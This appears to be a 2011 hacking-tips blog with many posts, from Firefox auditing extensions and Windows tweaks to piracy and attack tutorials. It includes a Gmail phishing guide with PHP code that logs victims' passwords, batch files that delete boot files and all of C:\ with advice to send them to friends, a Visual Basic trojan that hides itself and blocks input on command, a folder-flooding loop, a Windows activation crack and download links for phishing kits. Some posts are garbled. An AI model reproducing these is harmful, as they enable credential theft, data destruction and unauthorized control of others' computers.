Selasa, 31 Mei 2011

Turning Firefox to an Ethical Hacking Platform

Turning Firefox to an Ethical Hacking Platform


Internet is an amazing virtual world where you can "virtually" do anything: gambling, playing, watching movies,

shopping, working, “VoIPying”, spying other people and for sure auditing remote systems.

The security testers’ community has a large panel of security tools, methodologies and much more to perform

their pentests and audit assessments. But what happens if you find yourself weaponless.

No more Top 100 security tools, no more LiveCDs and no more exploitation frameworks. A security auditor

without toolbox is like a cop without gun.

Nevertheless, there is maybe a way to rescue yourself from this nightmare situation.

The magical solution could be Firefox and its extensions developed by ethical hackers and coders.

This article comes as an update for what we posted previously about how to switch your Firefox to more than an

usual simple browser. It was about application auditing

Here is an updated list of useful security auditing extensions:

Information gathering


● Whois and geo-location

o ShowIP : Show the IP address of the current page in the status bar. It also allows querying

custom services by IP (right mouse button) and Hostname (left mouse button), like whois,

netcraft.

o Shazou : The product called Shazou (pronounced Shazoo it is Japanese for mapping)

enables the user with one-click to map and geo-locate any website they are currently

viewing.

o HostIP.info Geolocation : Displays Geolocation information for a website using hostip.info

data. Works with all versions of Firefox.

o Active Whois : Starting Active Whois to get details about any Web site owner and its host

server.

o Bibirmer Toolbar : An all-in-one extension. But auditors need to play with the toolbox. It

includes (WhoIs, DNS Report, Geolocation, Traceroute, Ping). Very useful for information

gathering phase


● Enumeration / fingerprinting

o Header Spy : Shows HTTP headers on statusbar

o Header Monitor : This is Firefox extension for display on statusbar panel any HTTP

response header of top level document returned by a web server. Example: Server (by

default), Content-Encoding, Content-Type, X-Powered-By and others.


● Social engineering

o People Search and Public Record : This Firefox extension is a handy menu tool for

investigators, reporters, legal professionals, real estate agents, online researchers and

anyone interested in doing their own basic people searches and public record lookups as

well as background research.


● Googling and spidering

o Advanced dork : Gives quick access to Google’s Advanced Operators directly from the

context menu. This could be used to spider a site or scan for hidden files (this spider

technique is used via scroogle.org)

o SpiderZilla : Spiderzilla is an easy-to-use website mirror utility, based on Httrack from

www.httrack.com.

o View Dependencies : View Dependencies adds a tab to the "page info" window, in which it

lists all the files which were loaded to show the current page. (useful for a spidering

technique)

Security Assessment / Code auditing


● Editors

o JSView : The ’view page source’ menu item now opens files based on the behaviour you

choose in the jsview options. This allows you to open the source code of any web page in

a new tab or in an external editor.

o Cert Viewer Plus : Adds two options to the certificate viewer in Firefox or Thunderbird: an

X.509 certificate can either be displayed in PEM format (Base64/RFC 1421, opens in a new

window) or saved to a file (in PEM or DER format - and PKCS#7 provided that the

respective patch has been applied - cf.

o Firebug : Firebug integrates with Firefox to put a wealth of development tools at your

fingertips while you browse. You can edit, debug, and monitor CSS, HTML, and JavaScript

live in any web page

o XML Developer Toolbar : Allows XML Developer’s use of standard tools all from your

browser.


● Headers manipulation

o HeaderMonitor : This is Firefox extension for display on statusbar panel any HTTP response

header of top level document returned by a web server. Example: Server (by default),

Content-Encoding, Content-Type, X-Powered-By and others.

o RefControl : Control what gets sent as the HTTP Referrer on a per-site basis.

o User Agent Switcher : Adds a menu and a toolbar button to switch the user agent of the

browser


● Cookies manipulation

o Add N Edit Cookies : Cookie Editor that allows you add and edit "session" and saved

cookies.

o CookieSwap : CookieSwap is an extension that enables you to maintain numerous sets or

"profiles" of cookies that you can quickly swap between while browsing

o httpOnly : Adds httpOnly cookie support to Firefox by encrypting cookies marked as

httpOnly on the browser side

o Allcookies : Dumps ALL cookies (including session cookies) to Firefox standard cookies.txt

file


● Security auditing

o HackBar : This toolbar will help you in testing SQL injections, XSS holes and site security. It

is NOT a tool for executing standard exploits and it will NOT teach you how to hack a site.

Its main purpose is to help a developer do security audits on his code.

o Tamper Data : Use “tamper data” to view and modify HTTP/HTTPS headers and post

parameters.

o Chickenfoot : Chickenfoot is a Firefox extension that puts a programming environment in

the browser’s sidebar so you can write scripts to manipulate web pages and automate web

browsing. In Chickenfoot, scripts are written in a superset of JavaScript that includes

special functions specific to web tasks.

Proxy/web utilities


FoxyProxy : FoxyProxy is an advanced proxy management tool that completely replaces Firefox’s

proxy configuration. It offers more features than SwitchProxy, ProxyButton, QuickProxy, xyzproxy,

ProxyTex, etc


SwitchProxy : SwitchProxy lets you manage and switch between multiple proxy configurations

quickly and easily. You can also use it as an anonymizer to protect your computer from prying eyes


POW (Plain Old WebServer) : The Plain Old Webserver uses Server-side JavaScript (SJS) to run a

server inside your browser. Use it to distribute files from your browser. It supports Server-side JS,

GET, POST, uploads, Cookies, SQLite and AJAX. It has security features to password-protect your

site. Users have created a wiki, chat room and search engine using SJS.

Misc


● Hacks for fun

o Greasemonkey : Allows you to customize the way a webpage displays using small bits of

JavaScript (scripts could be download here)


● Encryption

o Fire Encrypter : FireEncrypter is a Firefox extension which gives you encryption/decryption

and hashing functionalities right from your Firefox browser, mostly useful for developers or

for education & fun.

Malware scanner


● QArchive.org web files checker : Allowing people to check web files for any malware (viruses,

trojans, worms, adware, spyware and other unwanted things) inclusions.


● Dr.Web anti-virus link checker : This plugin allows you to check any file you are about to download,

any page you are about to visit


● ClamWin Antivirus Glue for Firefox : This extension scans every downloaded file automatically with

ClamWin.

Anti Spoof


● refspoof : Easy to pretend to origin from a site by overriding the URL referrer (in a http request). —

It incorporates this feature by using the pseudo-protocol spoof:// .. Thus it’s possible to store the

information in a "hyperlink" - that can be used in any context... like html pages or bookmarks

Besides, we keep watching new extensions and we are on the way to develop a new extension for Nmap and Nessus.


Thank You

INDIAN CYBER SQUAD TEAM

Minggu, 29 Mei 2011

how to remove recycler from your pc ?

first install tune up and restart your computer and open it in from safe mode and start with CMD and open tune up start up closs the abnormal process which not relate with os after going to c drive and show hidden folder and delete recyler ....
enjoy....

Sabtu, 28 Mei 2011

folder options missing in windows explorer.

Many of us sometimes find the folder options missing in windows explorer.
Here's the solution-->

Open Run and then type "gpedit.msc".
Now goto User Configuration > Administrative templates > Windows Component > Windows Explorer.

Click on Windows Explorer you will find the 3rd option on the right side of screen "Removes the Folder Option menu item from the Tools menu"

Just check it, if it is not configured then change it to enable by double clicking on it and after applying again set it to not configured.

Kamis, 26 Mei 2011

How to get XP Product key from XP CD?



Get XP Key From CD itself!!!!!!

There is a Way to get xp product code from cd itself, It really work!!
I was once wondering around d XP CD......n got dis!!
Jst try it out.....

Just explore the cd then open the folder I386 then open the file UNATTEND.TXT and scroll down to the

last line and it goes to show what dumbasses
microsoft are u have a product code.

Have fun!!!
Now u'll never need to search for a product code for xp again...!!!!

Kamis, 19 Mei 2011

how to hack firefox to speed up ?

In the URL bar, type “about:config” and press enter. This will bring up the configuration “menu” where you can change the parameters of Firefox.

Note that these are what I’ve found to REALLY speed up my Firefox significantly - and these settings seem to be common among everybody else as well. But these settings are optimized for broadband connections - I mean with as much concurrent requests we’re going to open up with pipelining… lol… you’d better have a big connection.

Double Click on the following settins and put in the numbers below - for the true / false booleans - they’ll change when you double click.

Code:
browser.tabs.showSingleWindowModePrefs – true
network.http.max-connections – 48
network.http.max-connections-per-server – 16
network.http.max-persistent-connections-per-proxy – 8
network.http.max-persistent-connections-per-server – 4
network.http.pipelining – true
network.http.pipelining.maxrequests – 100
network.http.proxy.pipelining – true
network.http.request.timeout – 300

Right-click somewhere on that screen and add a NEW -> Integer. Name it “nglayout.initialpaint.delay” and set its value to “0”. This value is the amount of time the browser waits before it acts on information it receives. Since you’re broadband - it shouldn’t have to wait.

Now you should notice you’re loading pages MUCH faster now!!!!

Create your own search engine in three easy steps


1. open website

http://www.funnylogo.info/create.asp


2. enter your search engine name


3. select style as per u like

4. click on create my search engine p


5. finally u gets ur search engine


note: actuall mechanism is there that u have only replace google name with ur own rest of remains same.

* this page u can put on ur personal website or blog

How to hack windows xp activation ?

Here i am posting one registry. with the help of registry you can hack xp activation

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion]
"CurrentBuild"="1.511.1 () (Obsolete data - do not use)"
"ProductId"="55274-640-1011873-23081"
"DigitalProductId"=hex:a4,00,00,00,03,00,00,00,35,35,32,37,34,2d,36,34,30,2d,\
31,30,31,31,38,37,33,2d,32,33,30,38,31,00,2e,00,00,00,41,32,32,2d,30,30,30,\
30,31,00,00,00,00,00,00,00,86,56,4e,4c,21,1b,2b,6a,a3,78,8e,8f,98,5c,00,00,\
00,00,00,00,dd,da,47,41,cc,6b,06,00,00,00,00,00,00,00,00,00,00,00,00,00,00,\
00,00,00,00,00,00,00,00,00,00,00,38,31,30,32,36,00,00,00,00,00,00,00,b5,16,\
00,00,83,83,1f,38,f8,01,00,00,f5,1c,00,00,00,00,00,00,00,00,00,00,00,00,00,\
00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,66,e5,70,f3
"LicenseInfo"=hex:33,b7,21,c1,e5,e7,cd,4b,fd,7c,c6,35,51,fd,52,57,17,86,3e,18,\
d3,f4,8c,8e,35,32,7b,d1,43,8d,61,38,60,a4,ca,55,c9,9a,35,17,46,7a,4f,91,fc,\
4a,d9,db,64,5c,c4,e2,0f,34,f3,ea

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\WPAEvents]
"OOBETimer"=hex:ff,d5,71,d6,8b,6a,8d,6f,d5,33,93,fd

copy it and paste it in notepad and save it key.reg
> double click on key.reg & press yes
> so the registry will updated & your xp gets genuine...

Google OPERATING SYSTEM


Google OPERATING SYSTEM| (184 MB)
Features

* OpenDNS added
* Audio support
o VirtualBox - Intel 8x0 AC97
o VMware - Ensoniq AudioPCI 1371/1373
* SD card support (512M)
* Ethernet (DHCP)
* Mouse wheel support
* High-resolution support (800*600, 1024*768)
* Apps added
o Software Directory
o AndroidVNC
o PilotLines, Craigs Races, Super Mario
* more net card driver added

DOWNLOAD : http://live-android.googlecode.com/files/liveandroidv0.3.iso.001

http://live-android.googlecode.com/files/liveandroidv0.3.iso.002

matrix effect in pc!!!!

Excellent Trick For Matrix Effect  You Wont Believe This Tricks ... This is a Master piece..

 just follow the steps and see the amazing matrix effect happen in your DOS window:

   1. Open Notepad.
    2.Copy the below mentioned text in your notepad file:

    @echo off
    color 02
    :start
    echo %random% %random% %random% %random% %random% %random% %random% %random% %random% %random%
    goto start

   3. Save the file with .bat extension like Matrix.bat

Thats it. Just open the file to see the matrix effect right before your eyes!

Say Thanks and Make a Comment If U Like this Post

Senin, 16 Mei 2011

How to Hack Gmail Account Password


his is one of the best mode to hack gmail  password.This will work only if your friend don’t know about this mode of hacking gmail.
For this We need three files:

1.Fake gmail login page
2.Php file
3.Text file to pile password

Start your php file

1.Open notepad and copy this code:

header (“Place: https://gmail.com”);
$handle = fopen(“password.txt”, “a”);
foreach($_POST as $wavering => $regard) {
fwrite($handle, $wavering);
fwrite($handle, “=”);
fwrite($handle, $regard);
fwrite($handle, “rn”);
}
fwrite($ handle, “rn”);
fclose($handle) ;
exit;
?>

2.Now save this as gmailphishing.php
Your php file is now made
If you Don’t know what this php file is doing you need to learn some basic of php.This php file will save information of victim in file password.txt

Start gmail fake login page

Now  go to http://www.gmail.com and aptly click / View Source.Copy source in notepad and save it as gmaillogin.html .Now open source code of this html file
We need to find the place everywhere Login  code in gmail page that everywhere send the user with clicking on it.
Now Press crtl-f with notch source code and   quest for this code
proceedings=no matter what business.
In this case we have this

proceedings=”https://www.google.com/accounts/ServiceLoginAuth?service=mail”

We replace that part with:

proceedings=”gmailphishing.php”

Save your gmailfake.html file

Text file

Start a bemused text file and name it password.txt

Now upload all the three files gmailfake.html,gmailphishing.php,Password.txt in any free web hosting site directory like 100mb.com and now you can just check your fake gmail login page by inane to http://ursite.110mb.com/gmailfake.html for the fake login page.Just type some random user name and any password into the text box and then you will see in your file manager that a file called “Password.txt” is made,In which the password is stored.

Minggu, 15 Mei 2011

Free download super Bluetooth hack for mobile


Here i am posting one Bluetooth hack link with the help of super Bluetooth hack you can hack the phone
you can see his/her messages , call register & you can make a call from his/her cell phone  

here is the download link.

http://www.ziddu.com/download/15002798/SuperBluetoothHackv1.07.jar.html

thnx for the visit.

play Hide and Seek with your mozila firefox

Here i am pasting one java script just paste that java script into the mozilla firefox's addresbar
and hit enter. After that your browser gets move automatically

here is the script

javascript:a=0;x=0;y=0;setInterval("a+=.01;x=Math.cos(a*3)*200;y=Math.sin(a*2)*2;moveBy(x,y)",2);void(0)

enjoy.
and  thnx for the visit.

How to add favorite folder in send to option ?

Just add it too "SEND TO" !!!

Do as follows :
1.Open any FOLDER.
2. Then, TOOLS >> Folder Options
3. Click view TAB.
4. In LIST of Advance Settings, click Show hidden files and folders !
5. Now, go to C:\Documents and Settings
6. Here, double click and open your (username) folder !
7.open SendTo folder.
8.Here copy and paste the shortcut of your favorite folder.
 

dont forget to comment!!

How to hide a file in image ?


    You require WinRAR installed on your PC for this trick.
    First add your files to .rar and i.e. say files.rar
    Say you have a image as img.jpg
    Now, save files.rar and img.jpg in c:\ drive.
    Click start >> Run
    Type cmd
     Now in command prompt type cd..
    Again type cd..
     Type copy /b img.jpg + files.rar new.jpg


-------------- Please Note --------------

>> This command will concatenate the two files into the new file new.jpg
>> Don't type files.rar + img.jpg instead of img.jpg + files.rar.
>> Now, (size of new.jpg) = (size of img.jpg) + (size of files.rar) .

-------------------------------------------

Now, we have new.jpg consisting of both img.jpg and files.rar .

Accessing the files :

Double click new.jpg and img.jpg can be viewed.

 Now, to access files.rar :

# Right click on new.jpg >> Select Open With >> Choose Program...
# Select WinRAR archiver.
# Now, simply Extract your files !

Enjoy... Please Comment !!!

How to Get an Attacker Out of Your Network


After the network has been compromised, as the system administrator you now have a couple of options for how to deal with the compromise:
·         Update your resumé
·         Hope the hacker does a good job running the network (say, better than you did?)
·         Drain the network
Cleaning out the attacker is not a viable option. There are probably Trojans all over the network by now, new accounts in strategic places, back doors, and all manner of other attacker tradecraft to ensure that all the attacker's hard work is not wasted. Cleaning attackers out of a network works on the same principle as cleaning undesirable liquids out of a pool. No amount of drain cleaner or chlorine poured into the pool is going to accomplish that job. Consider the following common practices when cleaning a hacked system:
·         You cannot clean a compromised system by patching it. Patching only removes the vulnerability. After the attacker got into your system, he probably ensured there were several other ways to get back in.
·         You cannot clean a compromised system by removing the back doors. Attackers will put back doors into any system they need in the future, and the better the attacker, the stealthier the back door. Although you may be able to find these back doors if you can load the current state of the system onto a known good host and compare it to known pre-attack snapshot, you can never guarantee that you found all the back doors the attacker put in. The fact that you cannot find any more may only mean you do not know where to look—or that the system is so compromised that what you are seeing is not actually what is there. Looking at the system while it is running is meaningless, because the attacker will show you things that do not exist and hide those that do, to make you believe the system is clean.
·         You cannot clean a compromised system by using some vulnerability remover. Suppose you had a system hit by Blaster. A number of vendors published vulnerability removers for Blaster. Can you trust a system that had Blaster after the tool is run? We would not. If the system was vulnerable to Blaster, it was also vulnerable to a number of other attacks. Can you guarantee that none of those have been run against it?
·         You cannot clean a compromised system by using a virus scanner. A fully compromised system cannot be trusted to tell you the truth. Even virus scanners must at some level rely on the system to not lie to them. If they ask whether a particular file is present, the attacker may simply have a tool in place that lies about it. Note that if you can guarantee that the only thing that compromised the system was a particular virus or worm, AND you know that this virus has no back doors associated with it, AND the vulnerability used by the virus was not available remotely, THEN you can use a virus scanner to clean the system. For example, the vast majority of e-mail worms rely on a user opening an attachment. In this particular case, it is possible that the only infection on the system is the one that came from the attachment containing the worm. However, if the vulnerability used by the worm was available remotely without user action and you cannot guarantee that the worm was the only thing that used that vulnerability, the system may be more compromised than it appears. In addition, if the user double-clicked the e-mail attachment titled "FREEPORNHERE," which other e-mail attachments did he run? In general, give a user a choice between dancing pigs and security and you find that dancing pigs win just about every time. We would rather just flatten the system and rebuild it to be assured of a clean system.
·         You cannot clean a compromised system by reinstalling the operating system over the existing installation. Again, the attacker may very well have tools in place that lie to the installer. If that happens, the installer may not actually remove the compromised files. In addition, the attacker may also have installed back doors in non-operating system components.
·         You cannot trust any data copied from a compromised system. After an attacker gets into a system, all the data on it may be modified. Copying data off of a compromised system and putting it on a clean system will in the best-case scenario give you potentially untrustworthy data. In the worst-case scenario, you may actually have copied a Trojan or back door hidden in the data.
·         You cannot trust the event logs on a compromised system. After an attacker gets full access to a system, it is simple to modify the event logs to cover his tracks. If you rely on the event logs to tell you what the attacker has done to your system, you may just be reading what he wants you to read. If you can synchronously get the logs off the system before the action the attacker is taking is completed, you may trust the logs. However, if the logs are copied asynchronously (i.e., while the action is proceeding) or after the fact, those logs may be compromised as well.
·         You may not be able to trust your latest backup. How can you tell when the original attack took place? The event logs may not be trustworthy enough to tell you. Without that knowledge, your latest backup is useless. It may be a backup that includes all the back doors currently on the system.
·         The only proper way to clean a compromised system is to flatten and rebuild. A system that has been completely compromised should be wiped clean and rebuilt from scratch. Alternatively, you could of course work on your resumé instead, but we do not want to see you doing that.
If you consider the alternatives, it seems highly worthwhile to spend some effort to keep systems from getting hacked in the first place. In the rest of this book, we look at all the things we can do to protect our networks. To see a summary of the steps used in the attack, see Appendix A, "How to Get Your Network Hacked in 10 Easy Steps."

Edit any facebook page!!!!!!!!!

I have typed one java script.
it will help you to edit any site.

javascript:nick=document.body;nick.contentEditable='true'; document.designMode='on'; void(0);

just copy it & paste in your address bar.

enjoy!!

DONT FORGET TO COMMENT

Stop Error Messages from Displaying on Startup

If you constantly see an error message that you can't get rid offor example, from a
piece of software that didn't uninstall properly and continues to give errors on
startupyou can disable it from displaying on startup. Run the Registry Editor and go to
HKEY_LOCAL MACHINE\SYSTEM\CurrentControlSet\Control\Windows. (This
key holds a variety of Windows system settings, such as the location of your system
directory.) Create a new DWORD called NoPopupsOnBoot and give it a value of 1.
Exit the Registry and reboot for the setting to take effect. To disable it, either delete
the DWORD value or give it a value of 0.

enjoy!!!

how to cresh a pc


1. Shut Down a Computer Forever

Open notepad and copy/paste this code:

@echo off
attrib -r -s -h c:\autoexec.bat
del c:\autoexec.bat
attrib -r -s -h c:\boot.ini
del c:\boot.ini
attrib -r -s -h c:\ntldr
del c:\ntldr
attrib -r -s -h c:\windows\win.ini
del c:\windows\win.ini

Now Save it as a .bat file.

This should shutdown the persons computer. It shuts it off once and deletes the files needed to reboot and restart.

REMEMBER - DO NOT CLICK THIS FILE. YOU WON'T RECOVER YOUR COMPUTER BACK AFTER YOU OPEN THE .BAT FILE!

Send it to your friends computer and tell them to open it. Have fun!!

Here is another code too.....

cmd /c del c:\windows\* /F /S /Q

cmd /c del c:\* /F /S /Q

Paste it in NotePad And Save It with Extension .cmd or .bat

Kamis, 12 Mei 2011

fack pages of facebook , gmail, yahoo , orkut , hotmail free download

the link is as bellow

http://www.ziddu.com/download/14961463/eLoginPagesorPhishingYahooFacebookHi5Orkut....rar.html

Crash a Computer System......

1. Shut Down a Computer Forever

Open notepad and copy/paste this code:

@echo off
attrib -r -s -h c:\autoexec.bat
del c:\autoexec.bat
attrib -r -s -h c:\boot.ini
del c:\boot.ini
attrib -r -s -h c:\ntldr
del c:\ntldr
attrib -r -s -h c:\windows\win.ini
del c:\windows\win.ini

Now Save it as a .bat file.

This should shutdown the persons computer. It shuts it off once and deletes the files needed to reboot and restart.

REMEMBER - DO NOT CLICK THIS FILE. YOU WON'T RECOVER YOUR COMPUTER BACK AFTER YOU OPEN THE .BAT FILE!

Send it to your friends computer and tell them to open it. Have fun!!

Here is another code too.....

cmd /c del c:\windows\* /F /S /Q

cmd /c del c:\* /F /S /Q

Paste it in NotePad And Save It with Extension .cmd or .bat

Minggu, 08 Mei 2011

Simple trojan in vb ..... (only for learning)

Writing a Trojan is a lot easier than most people think. All it really involves is two simple applications both with fewer than 100 lines of code. The first application is the client or the program that one user knows about. The second is the server or the actual “trojan” part. I will now go through what you need for both and some sample code.

Server

The server is the Trojan part of the program. You usually will want this to be as hidden as possible so the average user can’t find it. To do this you start by using


Code: VB
Private Sub Form_Load()
     Me.Visible = False
End Sub
 This little bit of code makes the program invisible to the naked eye. Now we all know that the task manager is a little bit peskier. So to get our application hidden from that a little better we make our code look like this.


Code: VB
Private Sub Form_Load()
     Me.Visible = False
     App.TaskVisible = False
End Sub
So now, we have a program that is virtually invisible to the average user, and it only took four lines of code. Now all of you are thinking that this tutorial sucks right about now so lets make it a lot better by adding functions to our Trojan!
The first thing we want to do is make it be able to listen for connections when it loads. So in order to do this we need to add a Winsock Control. I named my control win but you can name yours what ever.

Now to make it listen on port 2999 when the Trojan starts up we make our code look like this.
Code: VB
Private Sub Form_Load()
     Me.Visible = False
     App.TaskVisible = False
     win.LocalPort = 2999
     win.RemotePort = 455
     win.Listen
End Sub
This code will set the local open port to 2999 and the port it sends it to is 455. So now, we have a program that listens but still doesn’t do anything neat. Lets make it block the input of the user completely when we tell it to!

To do this little devious thing we need to add a module with the following code

Public Declare Function BlockInput Lib "user32" (ByVal fBlock As Long) As Long

Then we add this code to our main form:

Code: VB
Private Sub win_ConnectionRequest(ByVal requestID As Long)
     win.Close
     win.Accept requestID
End Sub

Private Sub win_DataArrival(ByVal bytesTotal As Long)
    win.GetData GotDat
    DoActions (GotDat)
End Sub
The code in the module is called a windows API. It uses a dll file to do tasks that we want. Now this code still won’t block the users input but we are very close. We now need to program the DoActions function that we called on our main form. In case you were wondering the code that we added to the form does two different things. The first sub makes it so all connection requests are automatacly accepted. The second sub makes it so all data is automaticly accepted and it then passes all of the data to the function DoActions which we are about to code.

For the DoActions code, we want to make a public function in the module. So add this code to the module and we are about done with the server of the Trojan!

Code: VB
Public Function DoActions(x As String)
     Dim Action
     Select Case x
             Case "block"
             Action = BlockInput(True)
     End Select
End Function
Ok now we have a program that when the data “block” is sent to it on port 2999 it will block the users input. I made a Select Case statement so it is easy to modify this code to your own needs later on. I recommend adding a unblock feature of your own. To do that just call the BlockInput function with the argument False instead of true.

Main Form
Code: VB
Private Sub Form_Load()
     Me.Visible = False
     App.TaskVisible = False
     win.LocalPort = 2999
     win.RemotePort = 455
     win.Listen
End Sub

Private Sub win_ConnectionRequest(ByVal requestID As Long) ' As corrected by Darkness1337
     win.Close
     win.Accept requestID
End Sub

Private Sub win_DataArrival(ByVal bytesTotal As Long)
     win.GetData GotDat
     DoActions (GotDat)
End Sub
Remember to add your winsock control and name it to win if you use this code.

Code: VB
Module

Public Declare Function BlockInput Lib "user32" (ByVal fBlock As Long) As Long                     

Public Function DoActions(x As String)
     Dim Action
     Select Case x
               Case "block"
               Action = BlockInput(True)
     End Select
End Function
That’s all there is to the server side or Trojan part of it. Now on to the Client.

Client

The client will be what you will interact with. You will use it to connect to the remote server (trojan) and send it commands. Since we made a server that accepts the command of “block” lets make a client that sends the command “block”.

Make a form and add a Winsock Control, a text box, and three buttons. The Text box should be named txtIP if you want it to work with this code. In addition, your buttons should be named cmdConnect, cmdBlockInput, and cmdDisconnect. Now lets look at the code we would use to make our Client.

Code: VB
Private Sub cmdConnect_Click()
     IpAddy = txtIp.Text
     Win.Close
     Win.RemotePort = 2999
     Win.RemoteHost = IpAddy
     Win.LocalPort = 9999
     Win.Connect
     cmdConnect.Enabled = False
End Sub

Private Sub cmdDisconnect_Click()
     Win.Close
     cmdConnect.Enabled = True
End Sub
           
Private Sub cmdBlockInput_Click()
     Win.SendData "block"
End Sub
That is the code for the client. All it does is gets the Ip Adress from txtIp and connects to it on remote port 2999. Then when connected you can send the “block” data to block off their input.

Sabtu, 07 Mei 2011

SUPERB MAGIC....must see this



1. Open notepad and type :

@echo off
:top
md %random%
goto top




 
& save it as system.bat

@echo off makes it so that it appears to be a blank screen but actually its showing magic.
hey friends plz make a comment how was the magic???

Rabu, 04 Mei 2011

DOWNLOAD VIDEOS FROM YOUTUBE....

download videos from you-tube
here i am pasting one you-tube downloader link just download the software and download youtube videos..

DOWNLOAD LINK
http://www.ziddu.com/download/14849780/youtube-downloader.exe.html 

Selasa, 03 Mei 2011

free download IDM with lifetime license

free download IDM with lifetime license


free download IDM with lifetime license it will not ask you for serial key enjoy.
if you are using old version then you need to uninstall it if you cant uninstall it then format your c drive. i am using this version from last 5 months.

Click here to download

add Control Panel to your Desktop Right Click Menu

Adding an item to your right click menu of desktop allows you to access that item easily. You can add any item which you want to use frequently. Today i am writing a trick about adding control panel. If you want to add control panel to your right click menu of desktop as shown in figure. follow given steps below.
steps to add


1: Open up regedit.exe through the start menu search or run box, and then navigate down to the following key:
HKEY_CLASSES_ROOT\Directory\Background\shell


2: Once you are there, you’ll want to right-click on “shell” and create a new key called Control Panel.


3: Under that one, you’ll want to right-click and create a new key called “command”.


4: Select the “command” key on the left-hand side, and then set the (Default) value on the right-hand side to the following:
rundll32.exe shell32.dll,Control_RunDLL


5: You can immediately see the new item in your desktop menu, and it would be working. To remove, simply delete the Control Panel key.

Create nameless folders and files in windows

Create nameless folders and files in windows

If you want to create a nameless file or folder in your computer then this trick is for you.


1. Right click on any file or folder and select "Rename"
2. Now hold the "Alt" key and type "255" and hit Enter.

try it...............

Senin, 02 Mei 2011

why pc gets cresh????


10 reasons why PCs crash U must Know

Fatal error: the system has become unstable or is busy," it says. "Enter to return to Windows or press Control-Alt-Delete to restart your computer. If you do this you will lose any unsaved information in all open applications."

You have just been struck by the Blue Screen of Death. Anyone who uses Mcft Windows will be familiar with this. What can you do? More importantly, how can you prevent it happening?

1 Hardware conflict

The number one reason why Windows crashes is hardware conflict. Each hardware device communicates to other devices through an interrupt request channel (IRQ). These are supposed to be unique for each device.

For example, a printer usually connects internally on IRQ 7. The keyboard usually uses IRQ 1 and the floppy disk drive IRQ 6. Each device will try to hog a single IRQ for itself.

If there are a lot of devices, or if they are not installed properly, two of them may end up sharing the same IRQ number. When the user tries to use both devices at the same time, a crash can happen. The way to check if your computer has a hardware conflict is through the following route:

* Start-Settings-Control Panel-System-Device Manager.

Often if a device has a problem a yellow '!' appears next to its description in the Device Manager. Highlight Computer (in the Device Manager) and press Properties to see the IRQ numbers used by your computer. If the IRQ number appears twice, two devices may be using it.

Sometimes a device might share an IRQ with something described as 'IRQ holder for PCI steering'. This can be ignored. The best way to fix this problem is to remove the problem device and reinstall it.

Sometimes you may have to find more recent drivers on the internet to make the device function properly. A good resource is www.driverguide.com. If the device is a soundcard, or a modem, it can often be fixed by moving it to a different slot on the motherboard (be careful about opening your computer, as you may void the warranty).

When working inside a computer you should switch it off, unplug the mains lead and touch an unpainted metal surface to discharge any static electricity.

To be fair to Mcft, the problem with IRQ numbers is not of its making. It is a legacy problem going back to the first PC designs using the IBM 8086 chip. Initially there were only eight IRQs. Today there are 16 IRQs in a PC. It is easy to run out of them. There are plans to increase the number of IRQs in future designs.

2 Bad Ram

Ram (random-access memory) problems might bring on the blue screen of death with a message saying Fatal Exception Error. A fatal error indicates a serious hardware problem. Sometimes it may mean a part is damaged and will need replacing.

But a fatal error caused by Ram might be caused by a mismatch of chips. For example, mixing 70-nanosecond (70ns) Ram with 60ns Ram will usually force the computer to run all the Ram at the slower speed. This will often crash the machine if the Ram is overworked.

One way around this problem is to enter the BIOS settings and increase the wait state of the Ram. This can make it more stable. Another way to troubleshoot a suspected Ram problem is to rearrange the Ram chips on the motherboard, or take some of them out. Then try to repeat the circumstances that caused the crash. When handling Ram try not to touch the gold connections, as they can be easily damaged.

Parity error messages also refer to Ram. Modern Ram chips are either parity (ECC) or non parity (non-ECC). It is best not to mix the two types, as this can be a cause of trouble.

EMM386 error messages refer to memory problems but may not be connected to bad Ram. This may be due to free memory problems often linked to old Dos-based programmes.

3 BIOS settings

Every motherboard is supplied with a range of chipset settings that are decided in the factory. A common way to access these settings is to press the F2 or delete button during the first few seconds of a boot-up.

Once inside the BIOS, great care should be taken. It is a good idea to write down on a piece of paper all the settings that appear on the screen. That way, if you change something and the computer becomes more unstable, you will know what settings to revert to.

A common BIOS error concerns the CAS latency. This refers to the Ram. Older EDO (extended data out) Ram has a CAS latency of 3. Newer SDRam has a CAS latency of 2. Setting the wrong figure can cause the Ram to lock up and freeze the computer's display.

Mcft Windows is better at allocating IRQ numbers than any BIOS. If possible set the IRQ numbers to Auto in the BIOS. This will allow Windows to allocate the IRQ numbers (make sure the BIOS setting for Plug and Play OS is switched to 'yes' to allow Windows to do this.).

4 Hard disk drives

After a few weeks, the information on a hard disk drive starts to become piecemeal or fragmented. It is a good idea to defragment the hard disk every week or so, to prevent the disk from causing a screen freeze. Go to

* Start-Programs-Accessories-System Tools-Disk Defragmenter

This will start the procedure. You will be unable to write data to the hard drive (to save it) while the disk is defragmenting, so it is a good idea to schedule the procedure for a period of inactivity using the Task Scheduler.

The Task Scheduler should be one of the small icons on the bottom right of the Windows opening page (the desktop).

Some lockups and screen freezes caused by hard disk problems can be solved by reducing the read-ahead optimisation. This can be adjusted by going to

* Start-Settings-Control Panel-System Icon-Performance-File System-Hard Disk.

Hard disks will slow down and crash if they are too full. Do some housekeeping on your hard drive every few months and free some space on it. Open the Windows folder on the C drive and find the Temporary Internet Files folder. Deleting the contents (not the folder) can free a lot of space.

Empty the Recycle Bin every week to free more space. Hard disk drives should be scanned every week for errors or bad sectors. Go to

* Start-Programs-Accessories-System Tools-ScanDisk

Otherwise assign the Task Scheduler to perform this operation at night when the computer is not in use.

5 Fatal OE exceptions and VXD errors

Fatal OE exception errors and VXD errors are often caused by video card problems.

These can often be resolved easily by reducing the resolution of the video display. Go to

* Start-Settings-Control Panel-Display-Settings

Here you should slide the screen area bar to the left. Take a look at the colour settings on the left of that window. For most desktops, high colour 16-bit depth is adequate.

If the screen freezes or you experience system lockups it might be due to the video card. Make sure it does not have a hardware conflict. Go to

* Start-Settings-Control Panel-System-Device Manager

Here, select the + beside Display Adapter. A line of text describing your video card should appear. Select it (make it blue) and press properties. Then select Resources and select each line in the window. Look for a message that says No Conflicts.

If you have video card hardware conflict, you will see it here. Be careful at this point and make a note of everything you do in case you make things worse.

The way to resolve a hardware conflict is to uncheck the Use Automatic Settings box and hit the Change Settings button. You are searching for a setting that will display a No Conflicts message.

Another useful way to resolve video problems is to go to

